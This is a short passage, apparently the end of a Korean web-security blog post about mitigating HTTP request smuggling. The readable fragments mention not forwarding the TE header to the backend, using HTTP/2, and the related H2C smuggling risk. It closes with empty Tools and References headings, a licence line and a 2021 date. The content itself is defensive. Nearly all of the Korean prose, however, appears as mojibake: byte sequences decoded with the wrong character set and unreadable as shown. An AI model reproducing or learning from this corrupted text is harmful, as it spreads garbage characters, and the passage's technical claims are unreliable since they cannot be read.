๋‘๋ฒˆ์จฐ ๋ฐฉ๋ฒ•์€ TE ํ—ค๋”๋ฅผ ๋ฌด์‹œํ•˜๋Š” ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค. TE ํ—ค๋” ์ž์ฒด๊ฐ€ ์ผ๋ฐ˜ ์„œ๋น„์Šค์—์„œ ๋ฌด์กฐ๊ฑด ์‚ฌ์šฉํ•˜๋Š” ํ—ค๋”๋Š” ์•„๋‹ˆ๊ธฐ ๋•Œ๋ฌธ์— ์„œ๋น„์Šค์—์„œ TE ์‚ฌ์šฉ์ด ํ•„์š”ํ•˜์ง€ ์•Š์€ ๊ฒฝ์šฐ TE ํ—ค๋”๋ฅผ ๋ฐฑ์—”๋“œ๋กœ ์ „๋‹ฌํ•˜์ง€ ์•Š๋Š” ๋ฐฉํ–ฅ์œผ๋กœ ์ˆ˜์ •์ด ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. ๋‹ค๋งŒ ์ด ๊ฒฝ์šฐ ์šฐํšŒํŒจํ„ด์œผ๋กœ ๋ฐฑ์—”๋“œ์— TE๋ฅผ ์ „๋‹ฌ์‹œํ‚ฌ ๊ฐ€๋Šฅ์„ฑ์ด ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ๊ผผ๊ผผํ•œ ๊ฒ€์ฆ์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค.

HTTP2 ์‚ฌ์šฉ

HTTP2๋ฅผ ๊ธฐ๋ฐ˜์œผ๋กœ ํ†ต์‹ ํ•˜๋Š” ๊ฒฝ์šฐ ์œ„ ๊ณต๊ฒฉ์— ์ทจ์•ฝํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ๋‹ค๋งŒ HTTP2 H2C Smuggling ์— ์˜ํ–ฅ์„ ๋ฐ›์„ ์ˆ˜ ์žˆ์œผ๋‹ˆ ์ฐธ๊ณ ๊ฐ€ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค.

๐Ÿ•น Tools

๐Ÿ“Œ References

Licensed under CC BY-NC-SA 4.0
Last updated on Aug 28, 2021 00:46 +0900